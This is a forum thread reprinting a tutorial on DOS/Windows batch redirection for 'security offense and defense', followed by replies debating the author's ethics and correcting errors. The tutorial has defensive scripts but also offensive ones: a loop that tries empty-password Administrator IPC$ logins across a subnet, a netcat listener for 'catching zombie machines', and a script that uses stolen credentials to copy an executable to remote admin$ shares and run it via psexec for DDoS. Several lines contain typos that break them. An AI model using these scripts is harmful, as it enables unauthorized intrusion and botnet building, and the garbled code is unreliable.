中国DOS联盟

===================;
The following is reprinted from www.bluedon.com
===================;

Application of Redirection Commands in Security Offense and Defense



Everyone knows that there is a command not commonly used under DOS - the redirection command. This little thing is very useful. This command can also be used under Win9x/ME/2000/XP. Flexibly using this command can bring great convenience to us - it will bring great convenience whether for intrusion, defense, or system application. Today let's take a look at several application examples of redirection commands in security.

　　I. Command Format

　　The standard input and output under DOS are usually carried out on the standard devices keyboard and display. Using redirection, the input and output can be conveniently redirected to disk files or other devices. Among them:

　　1. The greater-than sign ">" sends the command to a file or device, for example, printer>prn. When using the greater-than sign ">", some command outputs (such as error messages) cannot be redirected.

　　2. The double greater-than sign ">>" appends the command output to the end of the file without deleting the existing information in the file.

　　3. The less-than sign "<" obtains the input required by the command from a file instead of the keyboard.

　　4. The >& symbol redirects the output from one default I/O stream (stdout, stdin, stderr) to another default I/O stream. For example, command >output_file 2>&1 redirects all error messages during the command process from the screen to the standard file output. The values of the standard output are as follows:

　　Standard output Equivalent value

　　Stdin 0

　　Stdout 1

　　Stderr 2

　　Among them, 1 and 2 both create a file to store data; 4 may not be usable under DOS.

　　II. Output of Redirection Commands

　　Almost all commands send output to the screen. Even commands that send output to a drive or printer will display messages and prompts on the screen. To redirect output from the screen to a file or printer, use the greater-than sign (>). The greater-than sign can be used in most commands. For example, in the following command, the directory list generated by the dir command is redirected to the Dirlist.txt file: dir>dirlist.txt. If the Dirlist.txt file does not exist, the system will create it. If Dirlist.txt exists, the system will replace the information in the file with the output of the dir command.

　　To append the command output to the end of the file without losing any information in the file, use the double greater-than sign (>>). For example, in the following command, the directory list generated by the dir command is appended to the Dirlist.txt file: dir>dirlist.txt. To redirect input to a command, just as you can send command output to a file or printer instead of the screen, you can obtain the input of the command from a file instead of the keyboard. To obtain input from a file, use the less-than sign (<). For example, the following command will obtain the input of the sort command from the List.txt file: sort

　　III. Application Examples

　　1. Locking/Unlocking the Registry

　　Everyone knows that if the DWORD value "Disableregistrytools" in the branch HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\Policies\sys_tem (remove "_") is "1", the registry can be locked, so others cannot use the registry editor. Using the redirection command under DOS, the registry can be locked/unlocked, which is very convenient.

　　Open the Notepad program, create a new text file, and enter the following content:

　　@echo REGEDIT4>>123.reg
　　@echo.>>123.reg
　　@echo >>123.reg
　　@echo "DisableRegistryTools"=dword:00000001>>123.reg
　　@REGEDIT /S /C 123.reg
　　@deltree /y 123.reg

　　Save it as a batch file with the.bat extension, and clicking this file will lock the registry!

　　In the above command, echo is the echo command under DOS. Adding the "@" prefix character in front of it means that this line will not be displayed in the command line or DOS when executed. If you want to see the execution process of the program, remove the "@". When writing the above code, you should pay attention that "REGEDIT4" in the first line must be in uppercase letters, and there is no space between "echo" and "." in the second line. The content generated by ">>" will be appended to the file behind it. Adding deltree /y 123.reg at the last line of the file can delete the 123.reg file without confirmation.

　　To unlock the registry, you can edit this batch file. Just change "DisableRegistryTools"=dword:00000001 to "DisableRegistryTools"=dword:00000000, keep other content unchanged, save it as a.bat file, and clicking it will unlock the registry.

　　2. Recording the IP of Machines Logging in to 3389

　　Save the following content as 3389IP.bat:
　　time /t >>log.log
　　netstat -n -p tcp |find ":3389">>Log.log
　　start Explorer

　　Run 3389IP.bat, and then view the log.log file to see the IP of the machine logging in to 3389. Isn't it very convenient?

　　3. Restoring DOS Real Mode

　　Everyone knows that some malicious web pages will modify the registry of the viewer. Among various means, modifying the registry to make DOS real mode unavailable is one of the tricks. There are many ways to restore DOS real mode. Using a batch file combined with the redirection command is a relatively special trick, which is shared with you here.

　　echo off
　　echo REGEDIT4>c:\scanreg.reg
　　@echo.>>lock.reg
　　echo >>c:\scanreg.reg
　　echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
　　regedit /s c:\scanreg.reg
　　@del c:\scanreg.reg

　　Save it as a batch file with the.bat extension, and clicking this file will restore DOS real mode, and those DOS applications can be used again.

　　4. Waiting for the Shepherd Machine to Come

　　Is it very hard to find the shepherd machine every day? Using the redirection command and the batch file can let you find the shepherd machine simply! The method is to create a new text file with Notepad and enter the following content:

　　@echo off
　　:start
　　nc -vv -w 5 -l -p 80>>rouji.log
　　goto start

　　Save it as a.bat file (you need to prepare an nc.exe file in advance, which is the main program of the network fault event detection software Netcat), and then after running this program, you just wait for the shepherd machine to come to you actively! If you are lucky, 10 per day is not a problem.

　　5. Quick Empty Connection

　　An empty connection is a session established with the server without trust, in other words, it is an anonymous access to the server. Using the command net use \IP\ipc$ "" /user:"" can simply establish an empty connection with the target (requires the target to open IPC$). Using the redirection command and the for command can quickly make empty connections to a Class C network segment and save the results in a file for your analysis. The method is to edit a file with the following content with Notepad:

　　@echo off
　　echo 格式:test *.*.*>test.txt
　　for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use %1.%%Gipc$ "" /use:"Administrator" | find "命令完成" >>test.txt

　　Save the batch file as.bat and run it. The function of this batch file is to sequentially try to establish an ipc$ connection with the account administrator and empty password for the 254 ips in the specified Class C network segment. If successful, the result will be recorded in test.txt. This realizes the NT weak password scanning function! Among them, the function of the for command is to execute a specific command for each file in a group of files, that is, a series of commands can be generated with the specified loop range. The format of the For command is: FOR %variable IN (set) DO command , and the specific meaning:

　　%variable: Specify a single letter replaceable parameter.

　　(set): Specify one or a group of files. Wildcards can be used.

　　command: Specify the command to be executed for each file.

　　command-parameters: Specify parameters or command line switches for a specific command.

　　When using the FOR command in the batch file, use %%variable instead of %variable when specifying the variable. The variable name is case-sensitive, so %i is different from %I.

　　6. Forbidding Empty Connection

　　The existence of empty connections has certain dangers, so it is better to forbid it! The method is to enter net share to view the local shared resources, and then enter the following commands to delete the shares:

　　net share ipc$ /delete
　　net share admin$ /delete
　　net share c$ /delete
　　net share d$ /delete (if there are drives such as e, f, etc., they can be deleted in the same way)

　　Then create a new text file with Notepad and enter the following content:

　　@echo REGEDIT4>>123.reg
　　@echo.>>123.reg
　　@echo >>123.reg
　　@echo "RestrictAnonymous"=dword:00000001>>123.reg
　　@REGEDIT /S /C 123.reg
　　@deltree /y 123.reg

　　Save it as a batch file with the.bat extension, and clicking this file will forbid the empty connection.

　　7. Scanning All Computers Connected to This Machine with TCP Protocol

　　Scanning the ports of your own computer, finding that special ports are open, can check for trojans. Moreover, using the following batch file can also record the IP addresses of all computers connected to this machine with TCP protocol. The content of this.bat file is as follows:

　　data /t>>123.log
　　time /t>>123.log
　　netstat -n -p tcp 10>>123.log

　　In this way, not only the IP of the other party can be recorded, but also the time and date, which is convenient for you to view.

　　8. Automatically Obtaining DDoS Shepherd Machines

　　DDoS is the abbreviation of Distributed Denial of Service, which means distributed denial of service attack. It refers to using client/server technology to combine multiple computers as attack platforms to launch DoS attacks on one or more targets, thereby multiplying the power of denial of service attacks. Usually, the attacker uses a stolen account to install the DDoS master program on a computer. At a set time, the master program will communicate with a large number of agent programs, which have been installed on many computers on the Internet. When the agent program receives the instruction, it launches the attack. Using client/server technology, the master program can activate the operation of hundreds or thousands of agent programs in a few seconds.

　　Although it is not recommended to use DDoS to attack, it is necessary to master the technology. But how to obtain the shepherd machines for DDoS attack? Saving the following content as the ok.bat file can achieve the purpose:

　　@echo off
　　echo Automatically Obtain DDoS Shepherd Machines
　　for /f "tokens=1,3*" %i in (host.txt) do net use \%k\ipc$ /user:"%j"
　　copy %1 \%i\admin$\sysytem32
　　if errorelevel 0 goto success
　　psexec -d \%i c:\winnt\sys_tem(remove "_")32%1
　　net user \%i\ipc$ /del
　　:success
　　echo ------------------------------>>success.txt
　　echo Shepherd Machine:%i>>success.txt
　　echo Username:%j>>success.txt
　　echo Password:%k>>success.txt
　　echo ------------------------------>>success.txt

　　The usage method is ok.bat *.exe host.txt, where the format of host.txt is: ip administrator password. Okay, give it a try. But don't use it for destruction.

　　In fact, the method mentioned in this article mainly uses batch files and related commands. The redirection command is just a "connector" playing a connecting role in it, but its contribution is also great, so we should not forget the redirection command.

Good stuff written, it is recommended that everyone take a look.

DOS is not for this. Doubt the morality of the original poster of this post.

It is suggested that everyone enriches more in our forum and contributes their own experiences to novices. Especially willsort — he is very good at batch processing, usually explains very clearly and patiently, and constantly explores and corrects, pointing out his own understanding and analysis errors. (I'm starting to get a bit of his way of thinking, ha. Just kidding!)

Remember, in "How to Become a Hacker" it is said:

The most effective way to become a master is to learn the spirit of masters; not just to learn knowledge and emotions.

(I have no intention of not respecting other hardworking forum moderators, gold and silver medal members and experts. It's just that willsort's replies are really not just a few words, which makes me know him better. Please don't think too much!)

Last edited by 220110 on 2005-11-2 at 22:03 ]

Originally posted by Michael at 2005-11-2 21:44:
DOS is not for this. Doubt the ethics of the original poster of this thread.

You're overthinking. What I want to spread is technology and to enrich our forum.

Last edited by 220110 on 2005-11-2 at 22:09 ]

The building owner has worked hard. Thanks for the owner's enthusiasm. But I think this article reveals the original author's voyeuristic desire to a certain extent. Hehe.

1, I laugh at those who are ridiculous, stirring up such needless disputes;
2, Just say it, I am willing to "admit" everything everyone says, but please end this thread immediately and ask wengier to delete it as soon as possible (including reprinted articles);
3, I will continue to "peek" and switch to lurking "peeking", and leave when I have learned something;
4, To michael: I don't know if you were in a bad mood last night, but please remember your postscript: "Simple is beauty".

to 220110:
Dude, you're really fired up. I emphasized so much that it's the "original author" not the thread starter, and yet you still misunderstood. I'm really sorry.
But when I saw things like "waiting for the zombie computer to come to the door" and "DDOS attacking others", I feel that the "original author" of this article is disgusting.
As for the "voyeuristic desire" I mentioned, it's definitely about the "original author" of this article. I don't know if you don't understand or deliberately don't understand.

Once again, I apologize to 220110. I'm sorry.

PS: I was really in a bad mood last night because a server I made was attacked by boring people last weekend, which almost had serious consequences.

It's because you said in the 3rd floor that "the original author of this post" is not "the original author of this article", plus due to the changeable weather in Guangzhou leading to a cold, my head was a little dizzy for a while... The junior makes a bow here to apologize and beg for your understanding.

In addition, I would like to say more. No matter who it is, no matter whether it's good or bad, as an influential public figure, one should not easily make vague remarks.

Wish you happiness and all your wishes come true.

Haha, it turned out to be a typo on my part. This matter is settled...........

Originally posted by 220110 at 2005-11-3 19:32:
Due to the changeable weather in Guangzhou causing a cold, my head is dizzy for a while...

Hehe, so you are also from Guangzhou? I have a cold now too, dizzy～～～～～

To All:

I briefly browsed the first post and had some feelings, so I wrote this article. To avoid causing misunderstandings again, I would like to state specifically: This article only targets the original content in the first post, and does not target the original author and the re-posters of the original text! As for the controversies and discussions it has triggered in the moral field, I have some insights and may write about them in my blog in this forum in the future, which will not be elaborated here.

The first and second sections of this article mainly talk about redirection, and the third section mainly talks about attacks and defenses. Regarding the content in the first and second sections, the exposition is basically clear and understandable, but there are also certain omissions.

First of all, redirection is not a "command", but a set of functional characteristics unique to the command line. Because it has no command entry in COMMAND.COM and no support from external programs; we can call it "redirection characteristics", or "redirection functions", or we can also refer to the mark symbols representing these functional characteristics alone as "redirection symbols" (referring to >, >> <).

Secondly, the exposition of redirection output in the second section also includes redirection input ("<").

Thirdly, regarding the content of ">&", this article does not specify that it is a characteristic unique to the command line environment of Windows NT/2000/XP/2003 and other NT series operating systems (referred to as NT CMD), rather than a characteristic in the usual DOS environment.

Fourthly, the pipeline characteristics closely related to redirection and the pipeline symbol (|) are not mentioned in the first and second sections, but it is applied in the third section;

The content of the third section, because it involves a field I am not familiar with, it is not convenient to comment too much; but only in terms of the application of redirection in it, it does not have too much technical value. The code in the article basically only applies some basic redirection usages, and many in-depth usages and their technical extensions are not involved.

Of course, I do not generally deny the inherent value of this article. After all, it is also the fruit of the original author's hard work. As a tutorial for beginners, it still has its positive significance.

In addition, I am very happy to see that brothers 220110 and Michael have resolved their misunderstandings!

Last edited by willsort on 2005-11-7 at 19:51 ]

First, thank you to Brother willsort for the meticulous observation and wonderful comments. When reading this post, I felt the example of the practical application of the redirection operator in batch scripts. However, for a little error in this article (not targeting anyone, just for its content), I still point it out.

To add the command output to the end of the file without losing any information in the file, use the double greater than sign (>>). For example, in the following command, the directory list generated by the dir command is appended to the Dirlist.txt file: dir>dirlist.txt. Redirect input to a command. Just as you can send the command output to a file or printer instead of the screen, you can get the input of the command from a file instead of from the keyboard. To get input from a file, use the less than sign (<). For example, the following command will get the input of the sort command from the List.txt file: sort

There is an error in "dir>dirlist.txt" in this paragraph. It should be "dir>>dirlist.txt", and the last command in this paragraph seems to not be fully expressed.

In addition, there are some improper places in the text, such as the unnecessary "_" symbol added in the middle of "sys_tem". Although it has been explained later that there is no "_" here, it is still a bit annoying.

willsort's answers are always detailed.